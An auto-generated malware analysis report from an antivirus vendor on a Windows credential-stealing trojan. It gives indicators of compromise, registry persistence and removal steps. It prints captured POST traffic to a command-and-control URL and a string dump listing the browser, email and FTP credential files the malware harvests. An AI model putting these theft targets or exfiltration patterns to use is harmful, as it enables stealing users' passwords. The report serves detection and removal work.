ML.Attribute.HighConfidence_0547cd6c91

by malwarelabrobot on April 19th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), ML.Attribute.HighConfidence (Symantec), Trojan.Inject (Ikarus), Win32:Malware-gen (Avast)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 0547cd6c917a10b16f7eeaa46b5958d9
SHA1: 38d4343e634a804edd08aa168245b75cc500d583
SHA256: 059e6572291516436e190b0fe23c9951fe0cecc3f8da0e463aa8e8f8c06d260b
SSDeep: 6144:mUByrr oyzro4UDrvXvDimwdg/YgziIVJr4r4cazhQ fYqqQ6 euzfkVeyiCfD4:mUBgyoyvfO PYnziI/Y45TYqqQAQbHoE
Size: 419176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-08-14 22:15:54
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The ML creates the following process(es):

Window.exe:3624
%original file name%.exe:3596

The ML injects its code into the following process(es):

Window.exe:2308

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Window.exe:2308 makes changes in the file system.
The ML creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.lck (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\c5b88721db08c824db69d0bbc702beb8_88dcd395-b062-45b3-a6cd-79f37c0eba08 (616 bytes)

The ML deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.lck (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\c5b88721db08c824db69d0bbc702beb8_88dcd395-b062-45b3-a6cd-79f37c0eba08 (0 bytes)

The process %original file name%.exe:3596 makes changes in the file system.
The ML creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Order_Descriptions.doc (36 bytes)

The ML deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\__tmp_rar_sfx_access_check_1473382 (0 bytes)

Registry activity

The process Window.exe:3624 makes changes in the system registry.
The ML creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the ML adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"l0k0n0101010101010101010l0k0n" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe"

The process %original file name%.exe:3596 makes changes in the system registry.
The ML creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The ML deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
6864e41084347763b45087b1d1ecb997 c:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 135031 135168 4.58976 792daf1ebbf0f019d3486580dfe317d1
.rdata 139264 36820 36864 3.55965 9d62ca750ab21611bd69d7a3e5333d52
.data 176128 185200 3072 1.91669 ab0f244b352be8b4c7ffac28b0999542
.gfids 364544 252 512 1.49939 7af9f45b4511d68a2575fde63622b162
.rsrc 368640 89920 90112 4.71566 31ff23bedcd31dbf4e05d231582b63c5
.reloc 458752 9044 9216 4.64072 f61d7f0f6bcc5a445f5126dff171e1c0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://topsey5000.bplaced.net/loky/fre.php 144.76.167.70
teredo.ipv6.microsoft.com 157.56.120.207
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /loky/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: topsey5000.bplaced.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: B492B516
Content-Length: 177
Connection: close

..(.......ckav.ru......a.d.m.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.|.......................0...C.6.2.E.9.4.0.7.1.D.F.D.4.F.9.D.F.8.F.3.7.D.9.9.
HTTP/1.1 200 OK
Date: Tue, 18 Apr 2017 07:22:08 GMT
Server: Apache/2.4
Connection: close
Content-Type: text/html
........................File not found...


POST /loky/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: topsey5000.bplaced.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: B492B516
Content-Length: 204
Connection: close

..'.......ckav.ru......a.d.m.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.|.................... ................0...C.6.2.E.9.4.0.7.1.D.F.D.4.F.9.D.F.8.F.3.7.D.9.9.....5q9T5....
HTTP/1.1 404 Not Found
Date: Tue, 18 Apr 2017 07:22:08 GMT
Server: Apache/2.4
Connection: close
Content-Type: text/html
File not found...


POST /loky/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: topsey5000.bplaced.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: B492B516
Content-Length: 204
Connection: close

..'.......ckav.ru......a.d.m.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.......W.I.N.-.U.K.0.F.F.O.O.8.3.I.6.|...................k.................0...C.6.2.E.9.4.0.7.1.D.F.D.4.F.9.D.F.8.F.3.7.D.9.9.....eKTty....
HTTP/1.1 404 Not Found
Date: Tue, 18 Apr 2017 07:22:07 GMT
Server: Apache/2.4
Connection: close
Content-Type: text/html
File not found...


The ML connects to the servers at the following location(s):

rundll32.exe_3604:

.text
`.data
.rsrc
@.reloc
KERNEL32.dll
USER32.dll
msvcrt.dll
imagehlp.dll
ntdll.dll
?.ulf
.ue9]
ole32.dll
_amsg_exit
_wcmdln
rundll32.pdb
name="Microsoft.Windows.Shell.rundll32"
version="5.1.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
name="Microsoft.Windows.Shell.rundll32"
version="5.1.0.0"
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
{00000000-0000-0000-0000-000000000000}
\\?\Volume
\\?\UNC\
rundll32.exe
Windows host process (Rundll32)
6.1.7600.16385 (win7_rtm.090713-1255)
RUNDLL32.EXE
Windows
Operating System
6.1.7600.16385

window.exe_2308:

.text
`.rdata
@.data
j.Xf9
QSSSSSSh
uiSShx
u.hpSA
u.hTSA
SShE3
Xjf_j%f
HSVWj%Xjsf
DSVWj%Xjsf
0SVWj%Xjs[j\Zj._jpYju^jrf
4SVWj%Xjsf
PSVWj%Xjsf
SVWj%Xjsf
Yj%Xjsf
u.hpiA
SVWj*Xj.Zjpf
XjgYj%f
j%Xjsf
TSVWj%Xjs^j\[jMf
8VWj%Xjs_j\^jTf
j%XjsYj\f
(j%Xjsf
Xf
Xf
Sj%XjsYj\f
j.Xjzf
t|SSh
SShbA
Xj3[j2_j.ZjdYjl^f
SQLite format 3
hXXp://
hXXps://
password_value
origin_url
logins
SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
encryptedPassword
PK11_GetInternalKeySlot
PK11_CheckUserPassword
sqlite3_finalize
sqlite3_step
sqlite3_close
sqlite3_column_text
sqlite3_open16
sqlite3_prepare_v2
sqlite3_prepare
X!2$6*9(SKiasb !v<.qF58_qwe~QsRTYvdeTYb
Port
Password
MAC=XXXINSTALL=XXk
Fuckav.ru
More information: hXXp://VVV.ibsensoftware.com/
WS2_32.dll
GetProcessHeap
KERNEL32.dll
ole32.dll
OLEAUT32.dll
hXXp://topsey5000.bplaced.net/loky/fre.php
Windows
%s\%s
%s\%s\%s%s
%s\%s%s
ntdll.dll
%s\%s\User Data\Default\Login Data
%s\%s\User Data\Default\Web Data
%s%s\Login Data
%s%s\Default\Login Data
MapleStudio\ChromePlus
Google\Chrome
Nichrome
Google\Chrome SxS
\Opera\Opera Next\data
\Opera Software\Opera Stable
vaultcli.dll
%sX
Software\Microsoft\Internet Explorer\TypedURLs
%s\logins.json
%s\prefs.js
%s\signons.sqlite
signons.txt
signons2.txt
signons3.txt
%s\Mozilla\Firefox\profiles.ini
%s\Mozilla\Firefox\Profiles\%s
%s\Mozilla\SeaMonkey\profiles.ini
%s\Mozilla\SeaMonkey\Profiles\%s
%s\Flock\Browser\profiles.ini
%s\Flock\Browser\Profiles\%s
%s\Thunderbird\profiles.ini
%s\Thunderbird\Profiles\%s
%s\K-Meleon\profiles.ini
%s\K-Meleon\%s
%s\Comodo\IceDragon\profiles.ini
%s\Comodo\IceDragon\Profiles\%s
%s\NETGATE Technologies\BlackHawk\profiles.ini
%s\NETGATE Technologies\BlackHawk\Profiles\%s
%s\Postbox\profiles.ini
%s\Postbox\Profiles\%s
%s\8pecxstudios\Cyberfox\profiles.ini
%s\8pecxstudios\Cyberfox\Profiles\%s
%s\Moonchild Productions\Pale Moon\profiles.ini
%s\Moonchild Productions\Pale Moon\Profiles\%s
%s\FossaMail\profiles.ini
%s\FossaMail\Profiles\%s
%s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
%s\nss3.dll
sqlite3.dll
mozsqlite3.dll
nss3.dll
SOFTWARE\Mozilla\Mozilla Firefox
%s\%s\Main
PathToExe
SOFTWARE\Mozilla\Mozilla Thunderbird
SOFTWARE\Mozilla\FossaMail
SOFTWARE\Mozilla\Flock
%s\NETGATE\Black Hawk
SOFTWARE\Mozilla\Pale Moon
%s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
SOFTWARE\mozilla.org\SeaMonkey
%s\Mozilla\Profiles
SOFTWARE\Mozilla\SeaMonkey
SOFTWARE\Mozilla\Waterfox
firefox.exe
kernel32.dll
sCrypt32.dll
Shlwapi.dll
%s\Opera
wand.dat
bform_password_control
Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
%s\QupZilla\profiles\default\browsedata.db
%s\Apple Computer\Preferences\keychain.plist
%s\Apple Application Support\plutil.exe
-convert xml1 -s -o %s "%s"
%s\Data\AccCfg\Accounts.tdat
%s\Storage
Account.rec0
%s\Foxmail\mail
*.stg
%SYSTEMDRIVE%
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
Passwd
POP3Port
SMTP Email Address
SMTP Server
SMTP User Name
SMTP User
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
%s\32BitFtp.TMP
%s\32BitFtp.ini
%s\Estsoft\ALFTP\ESTdb2.dat
%s\site.xml
%s\BitKinex\bitkinex.ds
*.tlp
*.bscp
Software\Bitvise\BvSshClient
%s\BlazeFtp\site.dat
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
%s\Cyberduck
user.config
%s\iterate_GmbH
%s\EasyFTP\data
%s\ExpanDrive
*favorites.js
drives.js
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
%s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
%s\FileZilla\Filezilla.xml
%s\FileZilla\filezilla.xml
%s\FileZilla\recentservers.xml
%s\FileZilla\sitemanager.xml
%s\FlashFXP
*Sites.dat
*quick.dat
FtpServer
FtpUserName
FtpPassword
_FtpPassword
%s\FreshWebmaster\FreshFTP\FtpSites.SMF
%s\FTPBox\profiles.conf
%s\FTPGetter\Profile\servers.xml
%s\FTPGetter\servers.xml
%s\FTPInfo\ServerList.xml
%s\FTPInfo\ServerList.cfg
%s\FTP Navigator\Ftplist.txt
%s\FTP Now\sites.xml
%s\FTPShell\ftpshell.fsi
%s\.config\fullsync\profiles.xml
%s\DeluxeFTP\sites.xml
%s\GoFTP\settings\Connections.txt
JaSFtp
AbleFTP
%s\%s%i\encPwd.jsd
%s\%s%i\data\settings\sshProfiles-j.jsd
%s\%s%i\data\settings\ftpProfiles-j.jsd
Software\LinasFTP\Site Manager
%s\oZone3D\MyFTP\myPTF.ini
%s\NetDrive\NDSites.ini
%s\NetDrive2\drives.dat
%s\Fastream NETFile\My FTP Links
%s\NexusFile\userdata\ftpsite.ini
%s\NexusFile\ftpsite.ini
%s\INSoftware\NovaFTP\NovaFTP.db
%s\Notepad  \plugins\config\NppFTP\NppFTP.xml
%s\Odin Secure FTP Expert\QFDefault.QFQ
%s\Odin Secure FTP Expert\SiteInfo.QFP
PublicKeyFile
PortNumber
Software\9bis.com\KiTTY\Sessions
%s_dec
lsasrv.dll
lsass.exe
%s\Microsoft\Credentials
%s\Sessions
*.ini
%s\SftpNetDrive
*.cfg
%s\Sherrod Computers\sherrod FTP\favorites
#document.favoriteManager*
%s\SmartFTP
{*.xml
%s\Staff-FTP\sites.ini
%s\Steed\bookmarks.txt
%s\SuperPutty
sPTF://
PTF://
ftps://
%s\Syncovery
Syncovery.ini
%s\wcx_PTF.ini
%s\GHISLER\wcx_PTF.ini
FtpIniName
%s\UltraFXP\sites.xml
%s\WinFtp Client\Favorites.dat
%s\WS_FTP\WS_FTP.INI
%s\WS_FTP.INI
%s\Ipswitch
ws_PTF.ini
%s\NetSarang\Xftp\Sessions
%s\%s\%s.exe
%s\%s.%s
C:\Perl\site\bin;C:\Perl\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Wireshark

window.exe_2308_rwx_00400000_000A2000:

(string dump identical to window.exe_2308 above)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Window.exe:3624
    %original file name%.exe:3596

  2. Delete the original ML file.
  3. Delete or disinfect the following files created/modified by the ML:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\71DFD4\4F9DF8.lck (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-732923889-1296844034-1208581001-1000\c5b88721db08c824db69d0bbc702beb8_88dcd395-b062-45b3-a6cd-79f37c0eba08 (616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Order_Descriptions.doc (36 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "l0k0n0101010101010101010l0k0n" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Window.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
